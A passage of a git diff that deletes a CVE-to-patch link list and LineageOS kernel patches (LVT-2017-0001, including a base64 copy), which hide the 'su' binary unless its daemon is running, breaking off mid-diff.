-	Link - 4.4 - https://source.codeaurora.org/quic/la/kernel/msm-4.4/commit/?id=d815f54f15d765b5e0035a9d208d71567bcaace0
-CVE-2017-9720
-	Link - 3.10 - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=c74dbab508c7c07d8e2cf8230cc78bff4b710272
-	Link - 3.18 - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=737f415a5c637802786ec6d36288220cb4d3ae4d
-	Link - 3.18 - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=2c5616295a5411812188f515d6ecf1984b9c1798
-CVE-2017-9724
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=5328a92fa26eabe2ba259b1d813f9de488efc9ec
-CVE-2017-9725
-	Link - 3.10 - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=5479a3c164c8762b5bf91c5fae452882366adb6a
-	Link - 4.4 - https://source.codeaurora.org/quic/la/kernel/msm-4.4/commit/?h=aosp/android-4.4&id=1f8f9b566e8446c13b954220c226c58d22076f88
-CVE-2017-16525
-	Link - ^4.13 - https://github.com/torvalds/linux/commit/bd998c2e0df0469707503023d50d46cf0b10c787
-	Link - ^4.13 - https://github.com/torvalds/linux/commit/299d7572e46f98534033a9e65973f13ad1ce9047
-CVE-2017-16526
-	Link - ^4.13 - https://github.com/torvalds/linux/commit/bbf26183b7a6236ba602f4d6a2f7cade35bba043
-CVE-2017-16527
-	Link - ^4.13 - https://github.com/torvalds/linux/commit/124751d5e63c823092060074bd0abaae61aaa9c4
-CVE-2017-16528
-	Link - ^4.13 - https://github.com/torvalds/linux/commit/fc27fe7e8deef2f37cba3f2be2d52b6ca5eb9d57
-CVE-2017-16529
-	Link - ^4.13 - https://github.com/torvalds/linux/commit/bfc81a8bc18e3c4ba0cbaa7666ff76be2f998991
-CVE-2017-16530
-	Link - ^4.13 - https://github.com/torvalds/linux/commit/786de92b3cb26012d3d0f00ee37adf14527f35c4
-CVE-2017-16531
-	Link - ^4.13 - https://github.com/torvalds/linux/commit/bd7a3fe770ebd8391d1c7d072ff88e9e76d063eb
-CVE-2017-16532
-	Link - ^4.13 - https://github.com/torvalds/linux/commit/7c80f9e4a588f1925b07134bb2e3689335f6c6d8
-CVE-2017-16533
-	Link - ^4.13 - https://github.com/torvalds/linux/commit/f043bfc98c193c284e2cd768fefabe18ac2fed9b
-CVE-2017-16534
-	Link - ^4.13 - https://github.com/torvalds/linux/commit/2e1c42391ff2556387b3cb6308b24f6f65619feb
-CVE-2017-16535
-	Link - ^4.13 - https://github.com/torvalds/linux/commit/1c0edc3633b56000e18d82fc241e3995ca18a69e
-CVE-2017-16536
-	Link - ^4.13 - https://patchwork.kernel.org/patch/9963527/
-CVE-2017-16537
-	Link - ^4.13 - https://github.com/torvalds/linux/commit/58fd55e838276a0c13d1dc7c387f90f25063cbf3
-CVE-2017-16538
-	Link - ^4.13 - https://patchwork.linuxtv.org/patch/44566/
-	Link - ^4.13 - https://patchwork.linuxtv.org/patch/44567/
-CVE-2017-16643
-	Link - 3.5+ - https://github.com/torvalds/linux/commit/a50829479f58416a013a4ccca791336af3c584c7
-CVE-2017-16644
-	Link - https://patchwork.kernel.org/patch/9966135/
-CVE-2017-16645
-	Link - https://github.com/torvalds/linux/commit/ea04efee7635c9120d015dcdeeeb6988130cb67a
-CVE-2017-16646
-	Link - https://patchwork.linuxtv.org/patch/45291/
-CVE-2017-16647
-	Link - https://patchwork.ozlabs.org/patch/834686/
-CVE-2017-16648
-	Link - https://github.com/torvalds/linux/commit/b1cb7372fa822af6c06c8045963571d13ad6348b
-CVE-2017-16649
-	Link - https://patchwork.ozlabs.org/patch/834771/
-CVE-2017-16650
-	Link - https://patchwork.ozlabs.org/patch/834770/
-CVE-2017-16USB
-	Link - https://github.com/torvalds/linux/commit/7682e399485fe19622b6fd82510b1f4551e48a25
-	Link - https://patchwork.kernel.org/patch/9972281/
-	Link - https://github.com/torvalds/linux/commit/70e743e4cec3733dc13559f6184b35d358b9ef3f
-	Link - https://github.com/torvalds/linux/commit/122d6a347329818419b032c5a1776e6b3866d9b9
-	Link - https://github.com/torvalds/linux/commit/0a8fd1346254974c3a852338508e4a4cddbb35f1
-	Link - https://github.com/torvalds/linux/commit/f9a1c372299fed53d4b72bb601f7f3bfe6f9999c
-	Link - https://github.com/torvalds/linux/commit/58fc7f73a85d45a47057dad2af53502fdf6cf778
-	Link - https://github.com/torvalds/linux/commit/2a4340c57717162c6bf07a0860d05711d4de994b
-	Link - https://github.com/torvalds/linux/commit/6815a0b444572527256f0d0efd8efe3ddede6018
-CVE-2016-GadgetFS
-	Link - https://github.com/torvalds/linux/commit/0173a68bfb0ad1c72a6ee39cc485aa2c97540b98
-	Link - https://github.com/torvalds/linux/commit/520b72fc64debf8a86c3853b8e486aa5982188f0
-	Link - https://github.com/torvalds/linux/commit/6e76c01e71551cb221c1f3deacb9dcd9a7346784
-	Link - https://github.com/torvalds/linux/commit/f16443a034c7aa359ddf6f0f9bc40d01ca31faea
-	Link - https://github.com/torvalds/linux/commit/f50b878fed33e360d01dcdc31a8eeb1815d033d5
-	Link - https://github.com/torvalds/linux/commit/bb1107f7c6052c863692a41f78c000db792334bf
-	Link - https://github.com/torvalds/linux/commit/faab50984fe6636e616c7cc3d30308ba391d36fd
-	Link - https://github.com/torvalds/linux/commit/bcdbeb844773333d2d1c08004f3b3e25921040e5
-	Link - https://github.com/torvalds/linux/commit/1c069b057dcf64fada952eaa868d35f02bb0cfc2
-	Link - https://github.com/torvalds/linux/commit/add333a81a16abbd4f106266a2553677a165725f
-	Link - https://github.com/torvalds/linux/commit/7b01738112608ce47083178ae2b9ebadf02d32cc
-	Link - https://github.com/torvalds/linux/commit/0994b0a257557e18ee8f0b7c5f0f73fe2b54eec1
-LVT-2017-0001
-	Link - 3.0 - https://review.lineageos.org/#/c/171511
-	Link - 3.4 - https://review.lineageos.org/#/c/170648
-	Link - 3.10 - https://review.lineageos.org/#/c/170624
-	Link - 3.18 - https://review.lineageos.org/#/c/170516
-LVT-2017-0002
-	Link - 3.4 - https://review.lineageos.org/#/c/173619
-	Link - 3.10 - https://review.lineageos.org/#/c/173618
-	Link - 3.18 - https://review.lineageos.org/#/c/173535
-LVT-2017-0003
-	Link - 3.10 - https://review.lineageos.org/#/c/174289
-LVT-2017-0004
-	Link - 3.4 - https://review.lineageos.org/#/c/182172
-	Link - 3.10 - https://review.lineageos.org/#/c/182173
-	Link - 3.18 - https://review.lineageos.org/#/c/182174
-CVE-0000-0000
-#The above line must be the last line
diff --git a/Patches/Linux_CVEs/LVT-2017-0001/3.0/0001.patch b/Patches/Linux_CVEs/LVT-2017-0001/3.0/0001.patch
deleted file mode 100644
index 60ca075d..00000000
--- a/Patches/Linux_CVEs/LVT-2017-0001/3.0/0001.patch
+++ /dev/null
@@ -1,213 +0,0 @@
-From 37639228b9d0c6b7ae27f706c777305fd8c93b83 Mon Sep 17 00:00:00 2001
-From: Tom Marshall <tdm.code@gmail.com>
-Date: Fri, 28 Apr 2017 22:46:37 +0000
-Subject: [PATCH] kernel: Only expose su when daemon is running
-
-Note: this is for the 3.0 kernel and lacks the read-only mount point
-logic due to the non-extensible readdir implementation.
-
-It has been claimed that the PG implementation of 'su' has security
-vulnerabilities even when disabled.  Unfortunately, the people that
-find these vulnerabilities often like to keep them private so they
-can profit from exploits while leaving users exposed to malicious
-hackers.
-
-In order to reduce the attack surface for vulnerabilites, it is
-therefore necessary to make 'su' completely inaccessible when it
-is not in use (except by the root and system users).
-
-Change-Id: Ia7d50ba46c3d932c2b0ca5fc8e9ec69ec9045f85
----
-
-diff --git a/fs/exec.c b/fs/exec.c
-index 21379c3..5188cea 100644
---- a/fs/exec.c
-+++ b/fs/exec.c
-@@ -1538,6 +1538,11 @@
- 	if (retval < 0)
- 		goto out;
- 
-+	if (capable(CAP_SYS_ADMIN) && d_is_su(file->f_dentry)) {
-+		current->flags |= PF_SU;
-+		su_exec();
-+	}
-+
- 	/* execve succeeded */
- 	current->fs->in_exec = 0;
- 	current->in_execve = 0;
-diff --git a/fs/namei.c b/fs/namei.c
-index c78d051..60e83a2 100644
---- a/fs/namei.c
-+++ b/fs/namei.c
-@@ -1616,6 +1616,11 @@
- 		}
- 	}
- 
-+	if (!err) {
-+		if (d_is_su(nd->path.dentry) && !su_visible())
-+			err = -ENOENT;
-+	}
-+
- 	if (base)
- 		fput(base);
- 
-diff --git a/fs/readdir.c b/fs/readdir.c
-index 356f715..0362f9e 100644
---- a/fs/readdir.c
-+++ b/fs/readdir.c
-@@ -47,6 +47,14 @@
- 
- EXPORT_SYMBOL(vfs_readdir);
- 
-+static bool hide_name(const char *name, int namlen)
-+{
-+	if (namlen == 2 && !memcmp(name, "su", 2))
-+		if (!su_visible())
-+			return true;
-+	return false;
-+}
-+
- /*
-  * Traditional linux readdir() handling..
-  *
-@@ -84,6 +92,8 @@
- 		buf->result = -EOVERFLOW;
- 		return -EOVERFLOW;
- 	}
-+	if (hide_name(name, namlen))
-+		return 0;
- 	buf->result++;
- 	dirent = buf->dirent;
- 	if (!access_ok(VERIFY_WRITE, dirent,
-@@ -163,6 +173,8 @@
- 		buf->error = -EOVERFLOW;
- 		return -EOVERFLOW;
- 	}
-+	if (hide_name(name, namlen))
-+		return 0;
- 	dirent = buf->previous;
- 	if (dirent) {
- 		if (__put_user(offset, &dirent->d_off))
-@@ -244,6 +256,8 @@
- 	buf->error = -EINVAL;	/* only used if we fail.. */
- 	if (reclen > buf->count)
- 		return -EINVAL;
-+	if (hide_name(name, namlen))
-+		return 0;
- 	dirent = buf->previous;
- 	if (dirent) {
- 		if (__put_user(offset, &dirent->d_off))
-diff --git a/include/linux/dcache.h b/include/linux/dcache.h
-index 33cf6ce..81982da 100644
---- a/include/linux/dcache.h
-+++ b/include/linux/dcache.h
-@@ -427,6 +427,11 @@
- 
- extern struct dentry *lookup_create(struct nameidata *nd, int is_dir);
- 
-+static inline bool d_is_su(const struct dentry *dentry)
-+{
-+	return dentry && dentry->d_name.len == 2 && !memcmp(dentry->d_name.name, "su", 2);
-+}
-+
- extern int sysctl_vfs_cache_pressure;
- 
- #endif	/* __LINUX_DCACHE_H */
-diff --git a/include/linux/sched.h b/include/linux/sched.h
-index 18203a1..b6cf92f 100644
---- a/include/linux/sched.h
-+++ b/include/linux/sched.h
-@@ -93,6 +93,12 @@
- 
- #include <asm/processor.h>
- 
-+int  su_instances(void);
-+bool su_running(void);
-+bool su_visible(void);
-+void su_exec(void);
-+void su_exit(void);
-+
- struct exec_domain;
- struct futex_pi_state;
- struct robust_list_head;
-@@ -1811,6 +1817,8 @@
- #define PF_FREEZER_SKIP	0x40000000	/* Freezer should not count it as freezable */
- #define PF_FREEZER_NOSIG 0x80000000	/* Freezer won't send signals to it */
- 
-+#define PF_SU		0x00001000      /* task is su */
-+
- /*
-  * Only the _current_ task can read/write to tsk->flags, but other
-  * tasks can access tsk->flags in readonly mode for example
-diff --git a/kernel/exit.c b/kernel/exit.c
-index 1e019f3..a0aca0c 100644
---- a/kernel/exit.c
-+++ b/kernel/exit.c
-@@ -956,6 +956,11 @@
- 	exit_irq_thread();
- 
- 	exit_signals(tsk);  /* sets PF_EXITING */
-+
-+	if (tsk->flags & PF_SU) {
-+		su_exit();
-+	}
-+
- 	/*
- 	 * tsk->flags are checked in the futex code to protect against
- 	 * an exiting task cleaning up the robust pi futexes.
-diff --git a/kernel/fork.c b/kernel/fork.c
-index 3c26774..84cbf39 100644
---- a/kernel/fork.c
-+++ b/kernel/fork.c
-@@ -291,6 +291,8 @@
- 	if (err)
- 		goto out;
- 
-+	tsk->flags &= ~PF_SU;
-+
- 	tsk->stack = ti;
- 
- 	err = prop_local_init_single(&tsk->dirties);
-diff --git a/kernel/sched.c b/kernel/sched.c
-index cc6d028..1b64dac 100644
---- a/kernel/sched.c
-+++ b/kernel/sched.c
-@@ -84,6 +84,38 @@
- #define CREATE_TRACE_POINTS
- #include <trace/events/sched.h>
- 
-+static atomic_t __su_instances;
-+
-+int su_instances(void)
-+{
-+	return atomic_read(&__su_instances);
-+}
-+
-+bool su_running(void)
-+{
-+	return su_instances() > 0;
-+}
-+
-+bool su_visible(void)
-+{
-+	uid_t uid = current_uid();
-+	if (su_running())
-+		return true;
-+	if (uid == 0 || uid == 1000)
-+		return true;
-+	return false;
-+}
-+
-+void su_exec(void)
-+{
-+	atomic_inc(&__su_instances);
-+}
-+
-+void su_exit(void)
-+{
-+	atomic_dec(&__su_instances);
-+}
-+
- ATOMIC_NOTIFIER_HEAD(migration_notifier_head);
- 
- /*
diff --git a/Patches/Linux_CVEs/LVT-2017-0001/3.0/0001.patch.base64 b/Patches/Linux_CVEs/LVT-2017-0001/3.0/0001.patch.base64
deleted file mode 100644
index b40e7c9d..00000000
--- a/Patches/Linux_CVEs/LVT-2017-0001/3.0/0001.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-RnJvbSAzNzYzOTIyOGI5ZDBjNmI3YWUyN2Y3MDZjNzc3MzA1ZmQ4YzkzYjgzIE1vbiBTZXAgMTcgMDA6MDA6MDAgMjAwMQpGcm9tOiBUb20gTWFyc2hhbGwgPHRkbS5jb2RlQGdtYWlsLmNvbT4KRGF0ZTogRnJpLCAyOCBBcHIgMjAxNyAyMjo0NjozNyArMDAwMApTdWJqZWN0OiBbUEFUQ0hdIGtlcm5lbDogT25seSBleHBvc2Ugc3Ugd2hlbiBkYWVtb24gaXMgcnVubmluZwoKTm90ZTogdGhpcyBpcyBmb3IgdGhlIDMuMCBrZXJuZWwgYW5kIGxhY2tzIHRoZSByZWFkLW9ubHkgbW91bnQgcG9pbnQKbG9naWMgZHVlIHRvIHRoZSBub24tZXh0ZW5zaWJsZSByZWFkZGlyIGltcGxlbWVudGF0aW9uLgoKSXQgaGFzIGJlZW4gY2xhaW1lZCB0aGF0IHRoZSBQRyBpbXBsZW1lbnRhdGlvbiBvZiAnc3UnIGhhcyBzZWN1cml0eQp2dWxuZXJhYmlsaXRpZXMgZXZlbiB3aGVuIGRpc2FibGVkLiAgVW5mb3J0dW5hdGVseSwgdGhlIHBlb3BsZSB0aGF0CmZpbmQgdGhlc2UgdnVsbmVyYWJpbGl0aWVzIG9mdGVuIGxpa2UgdG8ga2VlcCB0aGVtIHByaXZhdGUgc28gdGhleQpjYW4gcHJvZml0IGZyb20gZXhwbG9pdHMgd2hpbGUgbGVhdmluZyB1c2VycyBleHBvc2VkIHRvIG1hbGljaW91cwpoYWNrZXJzLgoKSW4gb3JkZXIgdG8gcmVkdWNlIHRoZSBhdHRhY2sgc3VyZmFjZSBmb3IgdnVsbmVyYWJpbGl0ZXMsIGl0IGlzCnRoZXJlZm9yZSBuZWNlc3NhcnkgdG8gbWFrZSAnc3UnIGNvbXBsZXRlbHkgaW5hY2Nlc3NpYmxlIHdoZW4gaXQKaXMgbm90IGluIHVzZSAoZXhjZXB0IGJ5IHRoZSByb290IGFuZCBzeXN0ZW0gdXNlcnMpLgoKQ2hhbmdlLUlkOiBJYTdkNTBiYTQ2YzNkOTMyYzJiMGNhNWZjOGU5ZWM2OWVjOTA0NWY4NQotLS0KCmRpZmYgLS1naXQgYS9mcy9leGVjLmMgYi9mcy9leGVjLmMKaW5kZXggMjEzNzljMy4uNTE4OGNlYSAxMDA2NDQKLS0tIGEvZnMvZXhlYy5jCisrKyBiL2ZzL2V4ZWMuYwpAQCAtMTUzOCw2ICsxNTM4LDExIEBACiAJaWYgKHJldHZhbCA8IDApCiAJCWdvdG8gb3V0OwogCisJaWYgKGNhcGFibGUoQ0FQX1NZU19BRE1JTikgJiYgZF9pc19zdShmaWxlLT5mX2RlbnRyeSkpIHsKKwkJY3VycmVudC0+ZmxhZ3MgfD0gUEZfU1U7CisJCXN1X2V4ZWMoKTsKKwl9CisKIAkvKiBleGVjdmUgc3VjY2VlZGVkICovCiAJY3VycmVudC0+ZnMtPmluX2V4ZWMgPSAwOwogCWN1cnJlbnQtPmluX2V4ZWN2ZSA9IDA7CmRpZmYgLS1naXQgYS9mcy9uYW1laS5jIGIvZnMvbmFtZWkuYwppbmRleCBjNzhkMDUxLi42MGU4M2EyIDEwMDY0NAotLS0gYS9mcy9uYW1laS5jCisrKyBiL2ZzL25hbWVpLmMKQEAgLTE2MTYsNiArMTYxNiwxMSBAQAogCQl9CiAJfQogCisJaWYgKCFlcnIpIHsKKwkJaWYgKGRfaXNfc3UobmQtPnBhdGguZGVudHJ5KSAmJiAhc3VfdmlzaWJsZSgpKQorCQkJZXJyID0gLUVOT0VOVDsKKwl9CisKIAlpZiAoYmFzZSkKIAkJZnB1dChiYXNlKTsKIApkaWZmIC0tZ2l0IGEvZnMvcmVhZGRpci5jIGIvZnMvcmVhZGRpci5jCmluZGV4IDM1NmY3MTUuLjAzNjJmOWUgMTAwNjQ0Ci0tLSBhL2ZzL3JlYWRkaXIuYworKysgYi9mcy9yZWFkZGlyLmMKQEAgLTQ3LDYgKzQ3LDE0IEBACiAKIEVYUE9SVF9TWU1CT0wodmZzX3JlYWRkaXIpOwogCitzdGF0aWMgYm9vbCBoaWRlX25hbWUoY29uc3QgY2hhciAqbmFtZSwgaW50IG5hbWxlbikKK3sKKwlpZiAobmFtbGVuID09IDIgJiYgIW1lbWNtcChuYW1lLCAic3UiLCAyKSkKKwkJaWYgKCFzdV92aXNpYmxlKCkpCisJCQlyZXR1cm4gdHJ1ZTsKKwlyZXR1cm4gZmFsc2U7Cit9CisKIC8qCiAgKiBUcmFkaXRpb25hbCBsaW51eCByZWFkZGlyKCkgaGFuZGxpbmcuLgogICoKQEAgLTg0LDYgKzkyLDggQEAKIAkJYnVmLT5yZXN1bHQgPSAtRU9WRVJGTE9XOwogCQlyZXR1cm4gLUVPVkVSRkxPVzsKIAl9CisJaWYgKGhpZGVfbmFtZShuYW1lLCBuYW1sZW4pKQorCQlyZXR1cm4gMDsKIAlidWYtPnJlc3VsdCsrOwogCWRpcmVudCA9IGJ1Zi0+ZGlyZW50OwogCWlmICghYWNjZXNzX29rKFZFUklGWV9XUklURSwgZGlyZW50LApAQCAtMTYzLDYgKzE3Myw4IEBACiAJCWJ1Zi0+ZXJyb3IgPSAtRU9WRVJGTE9XOwogCQlyZXR1cm4gLUVPVkVSRkxPVzsKIAl9CisJaWYgKGhpZGVfbmFtZShuYW1lLCBuYW1sZW4pKQorCQlyZXR1cm4gMDsKIAlkaXJlbnQgPSBidWYtPnByZXZpb3VzOwogCWlmIChkaXJlbnQpIHsKIAkJaWYgKF9fcHV0X3VzZXIob2Zmc2V0LCAmZGlyZW50LT5kX29mZikpCkBAIC0yNDQsNiArMjU2LDggQEAKIAlidWYtPmVycm9yID0gLUVJTlZBTDsJLyogb25seSB1c2VkIGlmIHdlIGZhaWwuLiAqLwogCWlmIChyZWNsZW4gPiBidWYtPmNvdW50KQogCQlyZXR1cm4gLUVJTlZBTDsKKwlpZiAoaGlkZV9uYW1lKG5hbWUsIG5hbWxlbikpCisJCXJldHVybiAwOwogCWRpcmVudCA9IGJ1Zi0+cHJldmlvdXM7CiAJaWYgKGRpcmVudCkgewogCQlpZiAoX19wdXRfdXNlcihvZmZzZXQsICZkaXJlbnQtPmRfb2ZmKSkKZGlmZiAtLWdpdCBhL2luY2x1ZGUvbGludXgvZGNhY2hlLmggYi9pbmNsdWRlL2xpbnV4L2RjYWNoZS5oCmluZGV4IDMzY2Y2Y2UuLjgxOTgyZGEgMTAwNjQ0Ci0tLSBhL2luY2x1ZGUvbGludXgvZGNhY2hlLmgKKysrIGIvaW5jbHVkZS9saW51eC9kY2FjaGUuaApAQCAtNDI3LDYgKzQyNywxMSBAQAogCiBleHRlcm4gc3RydWN0IGRlbnRyeSAqbG9va3VwX2NyZWF0ZShzdHJ1Y3QgbmFtZWlkYXRhICpuZCwgaW50IGlzX2Rpcik7CiAKK3N0YXRpYyBpbmxpbmUgYm9vbCBkX2lzX3N1KGNvbnN0IHN0cnVjdCBkZW50cnkgKmRlbnRyeSkKK3sKKwlyZXR1cm4gZGVudHJ5ICYmIGRlbnRyeS0+ZF9uYW1lLmxlbiA9PSAyICYmICFtZW1jbXAoZGVudHJ5LT5kX25hbWUubmFtZSwgInN1IiwgMik7Cit9CisKIGV4dGVybiBpbnQgc3lzY3RsX3Zmc19jYWNoZV9wcmVzc3VyZTsKIAogI2VuZGlmCS8qIF9fTElOVVhfRENBQ0hFX0ggKi8KZGlmZiAtLWdpdCBhL2luY2x1ZGUvbGludXgvc2NoZWQuaCBiL2luY2x1ZGUvbGludXgvc2NoZWQuaAppbmRleCAxODIwM2ExLi5iNmNmOTJmIDEwMDY0NAotLS0gYS9pbmNsdWRlL2xpbnV4L3NjaGVkLmgKKysrIGIvaW5jbHVkZS9saW51eC9zY2hlZC5oCkBAIC05Myw2ICs5MywxMiBAQAogCiAjaW5jbHVkZSA8YXNtL3Byb2Nlc3Nvci5oPgogCitpbnQgIHN1X2luc3RhbmNlcyh2b2lkKTsKK2Jvb2wgc3VfcnVubmluZyh2b2lkKTsKK2Jvb2wgc3VfdmlzaWJsZSh2b2lkKTsKK3ZvaWQgc3VfZXhlYyh2b2lkKTsKK3ZvaWQgc3VfZXhpdCh2b2lkKTsKKwogc3RydWN0IGV4ZWNfZG9tYWluOwogc3RydWN0IGZ1dGV4X3BpX3N0YXRlOwogc3RydWN0IHJvYnVzdF9saXN0X2hlYWQ7CkBAIC0xODExLDYgKzE4MTcsOCBAQAogI2RlZmluZSBQRl9GUkVFWkVSX1NLSVAJMHg0MDAwMDAwMAkvKiBGcmVlemVyIHNob3VsZCBub3QgY291bnQgaXQgYXMgZnJlZXphYmxlICovCiAjZGVmaW5lIFBGX0ZSRUVaRVJfTk9TSUcgMHg4MDAwMDAwMAkvKiBGcmVlemVyIHdvbid0IHNlbmQgc2lnbmFscyB0byBpdCAqLwogCisjZGVmaW5lIFBGX1NVCQkweDAwMDAxMDAwICAgICAgLyogdGFzayBpcyBzdSAqLworCiAvKgogICogT25seSB0aGUgX2N1cnJlbnRfIHRhc2sgY2FuIHJlYWQvd3JpdGUgdG8gdHNrLT5mbGFncywgYnV0IG90aGVyCiAgKiB0YXNrcyBjYW4gYWNjZXNzIHRzay0+ZmxhZ3MgaW4gcmVhZG9ubHkgbW9kZSBmb3IgZXhhbXBsZQpkaWZmIC0tZ2l0IGEva2VybmVsL2V4aXQuYyBiL2tlcm5lbC9leGl0LmMKaW5kZXggMWUwMTlmMy4uYTBhY2EwYyAxMDA2NDQKLS0tIGEva2VybmVsL2V4aXQuYworKysgYi9rZXJuZWwvZXhpdC5jCkBAIC05NTYsNiArOTU2LDExIEBACiAJZXhpdF9pcnFfdGhyZWFkKCk7CiAKIAlleGl0X3NpZ25hbHModHNrKTsgIC8qIHNldHMgUEZfRVhJVElORyAqLworCisJaWYgKHRzay0+ZmxhZ3MgJiBQRl9TVSkgeworCQlzdV9leGl0KCk7CisJfQorCiAJLyoKIAkgKiB0c2stPmZsYWdzIGFyZSBjaGVja2VkIGluIHRoZSBmdXRleCBjb2RlIHRvIHByb3RlY3QgYWdhaW5zdAogCSAqIGFuIGV4aXRpbmcgdGFzayBjbGVhbmluZyB1cCB0aGUgcm9idXN0IHBpIGZ1dGV4ZXMuCmRpZmYgLS1naXQgYS9rZXJuZWwvZm9yay5jIGIva2VybmVsL2ZvcmsuYwppbmRleCAzYzI2Nzc0Li44NGNiZjM5IDEwMDY0NAotLS0gYS9rZXJuZWwvZm9yay5jCisrKyBiL2tlcm5lbC9mb3JrLmMKQEAgLTI5MSw2ICsyOTEsOCBAQAogCWlmIChlcnIpCiAJCWdvdG8gb3V0OwogCisJdHNrLT5mbGFncyAmPSB+UEZfU1U7CisKIAl0c2stPnN0YWNrID0gdGk7CiAKIAllcnIgPSBwcm9wX2xvY2FsX2luaXRfc2luZ2xlKCZ0c2stPmRpcnRpZXMpOwpkaWZmIC0tZ2l0IGEva2VybmVsL3NjaGVkLmMgYi9rZXJuZWwvc2NoZWQuYwppbmRleCBjYzZkMDI4Li4xYjY0ZGFjIDEwMDY0NAotLS0gYS9rZXJuZWwvc2NoZWQuYworKysgYi9rZXJuZWwvc2NoZWQuYwpAQCAtODQsNiArODQsMzggQEAKICNkZWZpbmUgQ1JFQVRFX1RSQUNFX1BPSU5UUwogI2luY2x1ZGUgPHRyYWNlL2V2ZW50cy9zY2hlZC5oPgogCitzdGF0aWMgYXRvbWljX3QgX19zdV9pbnN0YW5jZXM7CisKK2ludCBzdV9pbnN0YW5jZXModm9pZCkKK3sKKwlyZXR1cm4gYXRvbWljX3JlYWQoJl9fc3VfaW5zdGFuY2VzKTsKK30KKworYm9vbCBzdV9ydW5uaW5nKHZvaWQpCit7CisJcmV0dXJuIHN1X2luc3RhbmNlcygpID4gMDsKK30KKworYm9vbCBzdV92aXNpYmxlKHZvaWQpCit7CisJdWlkX3QgdWlkID0gY3VycmVudF91aWQoKTsKKwlpZiAoc3VfcnVubmluZygpKQorCQlyZXR1cm4gdHJ1ZTsKKwlpZiAodWlkID09IDAgfHwgdWlkID09IDEwMDApCisJCXJldHVybiB0cnVlOworCXJldHVybiBmYWxzZTsKK30KKwordm9pZCBzdV9leGVjKHZvaWQpCit7CisJYXRvbWljX2luYygmX19zdV9pbnN0YW5jZXMpOworfQorCit2b2lkIHN1X2V4aXQodm9pZCkKK3sKKwlhdG9taWNfZGVjKCZfX3N1X2luc3RhbmNlcyk7Cit9CisKIEFUT01JQ19OT1RJRklFUl9IRUFEKG1pZ3JhdGlvbl9ub3RpZmllcl9oZWFkKTsKIAogLyoK
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/LVT-2017-0001/3.10/0003.patch b/Patches/Linux_CVEs/LVT-2017-0001/3.10/0003.patch
deleted file mode 100644
index aa76e0df..00000000
--- a/Patches/Linux_CVEs/LVT-2017-0001/3.10/0003.patch
+++ /dev/null
@@ -1,246 +0,0 @@
-From 9bf58feca7c29ccff89abce4b4fce3394ebaf437 Mon Sep 17 00:00:00 2001
-From: Tom Marshall <tdm.code@gmail.com>
-Date: Wed, 25 Jan 2017 18:01:03 +0100
-Subject: [PATCH] kernel: Only expose su when daemon is running
-
-It has been claimed that the PG implementation of 'su' has security
-vulnerabilities even when disabled.  Unfortunately, the people that
-find these vulnerabilities often like to keep them private so they
-can profit from exploits while leaving users exposed to malicious
-hackers.
-
-In order to reduce the attack surface for vulnerabilites, it is
-therefore necessary to make 'su' completely inaccessible when it
-is not in use (except by the root and system users).
-
-Change-Id: I79716c72f74d0b7af34ec3a8054896c6559a181d
----
-
-diff --git a/fs/exec.c b/fs/exec.c
-index 227eb92..6f3965a 100644
---- a/fs/exec.c
-+++ b/fs/exec.c
-@@ -1564,6 +1564,11 @@
- 	if (retval < 0)
- 		goto out;
- 
-+	if (capable(CAP_SYS_ADMIN) && d_is_su(file->f_dentry)) {
-+		current->flags |= PF_SU;
-+		su_exec();
-+	}
-+
- 	/* execve succeeded */
- 	current->fs->in_exec = 0;
- 	current->in_execve = 0;
-diff --git a/fs/namei.c b/fs/namei.c
-index 827f0eb..a52456c 100644
---- a/fs/namei.c
-+++ b/fs/namei.c
-@@ -2000,6 +2000,14 @@
- 		}
- 	}
- 
-+	if (!err) {
-+		struct super_block *sb = nd->inode->i_sb;
-+		if (sb->s_flags & MS_RDONLY) {
-+			if (d_is_su(nd->path.dentry) && !su_visible())
-+				err = -ENOENT;
-+		}
-+	}
-+
- 	if (base)
- 		fput(base);
- 
-diff --git a/fs/readdir.c b/fs/readdir.c
-index d46eca8..d52d18d 100644
---- a/fs/readdir.c
-+++ b/fs/readdir.c
-@@ -39,6 +39,7 @@
- 	if (!IS_DEADDIR(inode)) {
- 		if (file->f_op->iterate) {
- 			ctx->pos = file->f_pos;
-+			ctx->romnt = (inode->i_sb->s_flags & MS_RDONLY);
- 			res = file->f_op->iterate(file, ctx);
- 			file->f_pos = ctx->pos;
- 		} else {
-@@ -52,6 +53,14 @@
- 	return res;
- }
- EXPORT_SYMBOL(iterate_dir);
-+
-+static bool hide_name(const char *name, int namlen)
-+{
-+	if (namlen == 2 && !memcmp(name, "su", 2))
-+		if (!su_visible())
-+			return true;
-+	return false;
-+}
- 
- /*
-  * Traditional linux readdir() handling..
-@@ -91,6 +100,8 @@
- 		buf->result = -EOVERFLOW;
- 		return -EOVERFLOW;
- 	}
-+	if (hide_name(name, namlen) && buf->ctx.romnt)
-+		return 0;
- 	buf->result++;
- 	dirent = buf->dirent;
- 	if (!access_ok(VERIFY_WRITE, dirent,
-@@ -168,6 +179,8 @@
- 		buf->error = -EOVERFLOW;
- 		return -EOVERFLOW;
- 	}
-+	if (hide_name(name, namlen) && buf->ctx.romnt)
-+		return 0;
- 	dirent = buf->previous;
- 	if (dirent) {
- 		if (__put_user(offset, &dirent->d_off))
-@@ -246,6 +259,8 @@
- 	buf->error = -EINVAL;	/* only used if we fail.. */
- 	if (reclen > buf->count)
- 		return -EINVAL;
-+	if (hide_name(name, namlen) && buf->ctx.romnt)
-+		return 0;
- 	dirent = buf->previous;
- 	if (dirent) {
- 		if (__put_user(offset, &dirent->d_off))
-diff --git a/include/linux/dcache.h b/include/linux/dcache.h
-index f84e0ee..5b04e17 100644
---- a/include/linux/dcache.h
-+++ b/include/linux/dcache.h
-@@ -413,6 +413,11 @@
- 	return dentry->d_flags & DCACHE_MOUNTED;
- }
- 
-+static inline bool d_is_su(const struct dentry *dentry)
-+{
-+	return dentry->d_name.len == 2 && !memcmp(dentry->d_name.name, "su", 2);
-+}
-+
- extern int sysctl_vfs_cache_pressure;
- 
- #endif	/* __LINUX_DCACHE_H */
-diff --git a/include/linux/fs.h b/include/linux/fs.h
-index 8aae0ef..d07e5a1 100644
---- a/include/linux/fs.h
